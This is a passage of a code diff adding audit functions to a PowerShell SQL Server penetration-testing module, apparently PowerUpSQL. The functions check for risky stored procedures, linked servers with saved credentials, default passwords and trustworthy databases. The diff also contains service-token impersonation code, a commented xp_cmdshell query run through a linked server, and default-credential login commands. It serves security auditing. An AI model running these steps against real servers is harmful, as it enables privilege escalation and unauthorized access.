}else{ + write-verbose "$Instance : $WinCurrentUserName has local admin privileges." + } + + # Check for running sql service processes that match the instance + Write-Verbose -Message "$Instance : Impersonating SQL Server process:" + [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId + [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount + + # Return if no matches exist + if ($TargetPid -eq 0){ + Write-Verbose -Message "$Instance : No process running for provided instance..." + return + } + + # Status user if a match is found + Write-Verbose -Message "$Instance : - Process ID: $TargetPid" + Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" + + # Attempt impersonation + try{ + Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Impersonation failed." + Write-Verbose -Message " $Instance : $ErrorMessage" + return + } + + Write-Verbose -Message "$Instance : Done." + } + + End + { + } +} + + +# --------------------------------------- +# Invoke-SQLAuditSQLiSpExecuteAs +# --------------------------------------- +# Author: Scott Sutherland +Function Invoke-SQLAuditSQLiSpExecuteAs +{ + <# + .SYNOPSIS + This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection. + There is also an options to check for + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditSQLiSpExecuteAs -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Potential SQL Injection + Description : The affected procedure is using dynamic SQL and the "EXECUTE AS OWNER" clause. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible. + server. + Remediation : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' + Severity : High + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\STANDARDDEV2014 -Keyword "EXECUTE AS OWNER" + Details : The testdb.dbo.sp_vulnerable stored procedure is affected. + Reference : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpExecuteAs -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit + ) + + Begin + { + # Table for output + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') + } + + Process + { + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER" + + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + # Status user + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER." + Return + } + + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) + { + $TestMode = 'Exploit' + } + else + { + $TestMode = 'Audit' + } + $Vulnerability = 'Potential SQL Injection - EXECUTE AS OWNER' + $Description = 'The affected procedure is using dynamic SQL and the "EXECUTE AS OWNER" clause. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible.' + $Remediation = 'Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' + $Severity = 'High' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = "No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -Keyword `"EXECUTE AS OWNER`"'" + $Details = '' + $Reference = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' + + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- + # $IsVulnerable = "No" or $IsVulnerable = "Yes" + + # Get SP with dynamic sql and execute as owner + $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Keyword "EXECUTE AS OWNER" + + # Check for results + if($SQLiResults.rows.count -ge 1){ + + # Confirmed vulnerable + $IsVulnerable = "Yes" + $IsExploitable = "Unknown" + + # Add information to finding for each instance of potential sqli + $SQLiResults | + ForEach-Object{ + + # Set instance values + $DatabaseName = $_.DatabaseName + $SchemaName = $_.SchemaName + $ProcedureName = $_.ProcedureName + $ObjectName = "$DatabaseName.$SchemaName.$ProcedureName" + $Details = "The $ObjectName stored procedure is affected." + + # Add to report + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + + # ------------------------------------------------------------------ + # Exploit Vulnerability + # ------------------------------------------------------------------ + if($Exploit){ + Write-Verbose "$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments." + } + + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# --------------------------------------- +# Invoke-SQLAuditSQLiSpSigned +# --------------------------------------- +# Author: Scott Sutherland +Function Invoke-SQLAuditSQLiSpSigned +{ + <# + .SYNOPSIS + This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection. + There is also an options to check for + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditSQLiSpSigned -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Potential SQL Injection + Description : The affected procedure is using dynamic SQL and is signed. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible. + server. + Remediation : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' + Severity : High + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\STANDARDDEV2014 -Keyword "EXECUTE AS OWNER" + Details : The testdb.dbo.sp_vulnerable stored procedure is affected. + Reference : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpSigned -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit + ) + + Begin + { + # Table for output + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') + } + + Process + { + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login" + + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + # Status user + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login." + Return + } + + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) + { + $TestMode = 'Exploit' + } + else + { + $TestMode = 'Audit' + } + $Vulnerability = 'Potential SQL Injection - Signed by Certificate Login' + $Description = 'The affected procedure is using dynamic SQL and has been signed by a certificate login. As a result, it may be possible to impersonate signer if SQL injection is possible.' + $Remediation = 'Consider using parameterized queries instead of concatenated strings.' + $Severity = 'High' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = "No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -OnlySigned" + $Details = '' + $Reference = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' + + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- + # $IsVulnerable = "No" or $IsVulnerable = "Yes" + + # Get SP with dynamic sql and execute as owner + $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -OnlySig + + # Check for results + if($SQLiResults.rows.count -ge 1){ + + # Confirmed vulnerable + $IsVulnerable = "Yes" + $IsExploitable = "Unknown" + + # Add information to finding for each instance of potential sqli + $SQLiResults | + ForEach-Object{ + + # Set instance values + $DatabaseName = $_.DatabaseName + $SchemaName = $_.SchemaName + $ProcedureName = $_.ProcedureName + $ObjectName = "$DatabaseName.$SchemaName.$ProcedureName" + $Details = "The $ObjectName stored procedure is affected." + + # Add to report + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + + # ------------------------------------------------------------------ + # Exploit Vulnerability + # ------------------------------------------------------------------ + if($Exploit){ + Write-Verbose "$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments." + } + + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# --------------------------------------- +# Invoke-SQLAuditPrivServerLink +# --------------------------------------- +# Author: Scott Sutherland +Function Invoke-SQLAuditPrivServerLink +{ + <# + .SYNOPSIS + Check if any SQL Server links are configured with remote credentials. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditPrivServerLink -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Excessive Privilege - Linked Server + Description : One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote + server. + Remediation : Configure SQL Server links to connect to remote servers using the login's current security context. + Severity : Medium + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : Example query: SELECT * FROM OPENQUERY([Server01\SQLEXPRESS],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER') + Details : The SQL Server link Server01\SQLEXPRESS was found configured with the test login. + Reference : https://msdn.microsoft.com/en-us/library/ms190479.aspx + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivServerLink -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit + ) + + Begin + { + # Table for output + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') + } + + Process + { + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Server Link" + + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + # Status user + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link." + Return + } + else + { + Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + } + + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) + { + $TestMode = 'Exploit' + } + else + { + $TestMode = 'Audit' + } + $Vulnerability = 'Excessive Privilege - Linked Server' + $Description = 'One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote server.' + $Remediation = "Configure SQL Server links to connect to remote servers using the login's current security context." + $Severity = 'Medium' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = 'There is not exploit available at this time.' + if($Username) + { + #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Username $Username -Password $Password -Exploit" + } + else + { + #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Exploit" + } + $Details = '' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms190479.aspx' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' + + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- + + # Select links configured with static credentials + $LinkedServers = Get-SQLServerLink -Verbose -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | + Where-Object { $_.LocalLogin -ne 'Uses Self Credentials' -and ([string]$_.RemoteLoginName).Length -ge 1} + + # Update vulnerable status + if($LinkedServers) + { + $IsVulnerable = 'Yes' + $LinkedServers | + ForEach-Object -Process { + $Details = + $LinkName = $_.DatabaseLinkName + $LinkUser = $_.RemoteLoginName + $LinkAccess = $_.is_data_access_enabled + $ExploitCmd = "Example query: SELECT * FROM OPENQUERY([$LinkName],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER')" + + if($LinkUser -and $LinkAccess -eq 'True') + { + Write-Verbose -Message "$Instance : - The $LinkName linked server was found configured with the $LinkUser login." + $Details = "The SQL Server link $LinkName was found configured with the $LinkUser login." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + } + } + else + { + Write-Verbose -Message "$Instance : - No exploitable SQL Server links were found." + } + + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + # $IsExploitable = "No" or $IsExploitable = "Yes" + # Check if the link is alive and verify connection + check if sysadmin + + + # ----------------------------------------------------------------- + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role + # ----------------------------------------------------------------- + # $Exploited = "No" or $Exploited = "Yes" + # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') + # Also, recommend link crawler module + + + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# --------------------------------------- +# Invoke-SQLAuditDefaultLoginPw +# --------------------------------------- +# Author: Scott Sutherland +# Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md +Function Invoke-SQLAuditDefaultLoginPw +{ + <# + .SYNOPSIS + Based on the instance name, test if SQL Server is configured with default passwords. + There is also an options to check for + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditDefaultLoginPw -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Default SQL Server Login Password + Description : The target SQL Server instance is configured with a default SQL login and password. + Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. + Severity : High + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : Get-SQLQuery -Verbose -Instance SQLServer1\STANDARDDEV2014 -Q "Select @@Version" -Username test -Password test. + Details : Affected credentials: test/test. + Reference : https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditDefaultLoginPw -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit ) Begin { # Table for output - $TblFileInstances = New-Object -TypeName System.Data.DataTable - $null = $TblFileInstances.Columns.Add('ComputerName') - $null = $TblFileInstances.Columns.Add('Instance') + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') } Process { - # Test file path - if(Test-Path $FilePath) + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Default SQL Server Login Password" + + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) { - Write-Verbose -Message 'Importing instances from file path.' + $TestMode = 'Exploit' } else { - Write-Output -InputObject 'File path does not appear to be valid.' - break + $TestMode = 'Audit' } + $Vulnerability = 'Default SQL Server Login Password' + $Description = 'The target SQL Server instance is configured with a default SQL login and password used by a common application.' + $Remediation = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.' + $Severity = 'High' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = "Get-SQLQuery -Verbose -Instance $Instance -Q `"Select @@Version`" -Username test -Password test." + $Details = '' + $Reference = 'https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' - # Grab lines from file - Get-Content -Path $FilePath | - ForEach-Object -Process { - $Instance = $_ - if($Instance.Split(',')[1]) - { - $ComputerName = $Instance.Split(',')[0] - } - else - { - $ComputerName = $Instance.Split('\')[0] - } - - # Add record - if($_ -ne '') - { - $null = $TblFileInstances.Rows.Add($ComputerName,$Instance) - } - } + # Check for default passwords + $Results = Get-SQLServerLoginDefaultPw -Verbose -Instance $Instance + + if($Results){ + $IsVulnerable = "Yes" + $IsExploitable = "Yes" + } + + # Create report records + $Results | + ForEach-Object { + $DefaultComputer = $_.Computer + $DefaultInstance = $_.Instance + $DefaultUsername = $_.Username + $DefaultPassword = $_.Password + $DefaultIsSysadmin = $_.IsSysadmin + + # Check if sysadmin + + # Add record + $Details = "Default credentials found: $DefaultUsername / $DefaultPassword (sysadmin: $DefaultIsSysadmin)." + $ExploitCmd = "Get-SQLQuery -Verbose -Instance $DefaultInstance -Q `"Select @@Version`" -Username $DefaultUsername -Password $DefaultPassword" + $null = $TblData.Rows.Add($DefaultComputer, $DefaultInstance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + + #Status user + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Default SQL Server Login Password" } - End - { - - # Status User - $FileInstanceCount = $TblFileInstances.rows.count - Write-Verbose -Message "$FileInstanceCount instances where found in $FilePath." - + { # Return data - $TblFileInstances + if ( -not $NoOutput) + { + Return $TblData + } } } -#endregion - -######################################################################### -# -#region PASSWORD RECOVERY FUNCTIONS -# -######################################################################### -# -#endregion - -######################################################################### -# -#region DATA EXFILTRATION FUNCTIONS -# -######################################################################### -# -#endregion - -######################################################################### -# -#region PERSISTENCE FUNCTIONS -# -######################################################################### -# -#endregion -######################################################################### -# -#region PRIVILEGE ESCALATION FUNCTIONS -# -######################################################################### # --------------------------------------- -# Template Function +# Invoke-SQLAuditPrivTrustworthy # --------------------------------------- # Author: Scott Sutherland -# Note: This is just a template for building other escalation functions. -Function Invoke-SQLAuditTemplate +Function Invoke-SQLAuditPrivTrustworthy { + <# + .SYNOPSIS + Check if any databases have been configured as trustworthy. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditPrivTrustworthy -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Excessive Privilege - Trustworthy Database + Description : One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database + and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules + that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on + the server. + Remediation : Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to + set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it. + Severity : Low + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : There is not exploit available at this time. + Details : The database testdb was found configured as trustworthy. + Reference : https://msdn.microsoft.com/en-us/library/ms187861.aspx + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivTrustworthy -Verbose + #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, @@ -9539,7 +20373,7 @@ Function Invoke-SQLAuditTemplate Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: [VULNERABILITY NAME]" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Trusted Database" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -9549,7 +20383,7 @@ Function Invoke-SQLAuditTemplate { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database." Return } else @@ -9558,7 +20392,7 @@ Function Invoke-SQLAuditTemplate } # Grab server information - $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName @@ -9573,30 +20407,52 @@ Function Invoke-SQLAuditTemplate { $TestMode = 'Audit' } - $Vulnerability = '' - $Description = '' - $Remediation = '' - $Severity = '' + $Vulnerability = 'Excessive Privilege - Trustworthy Database' + $Description = 'One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules that are defined to execute as high 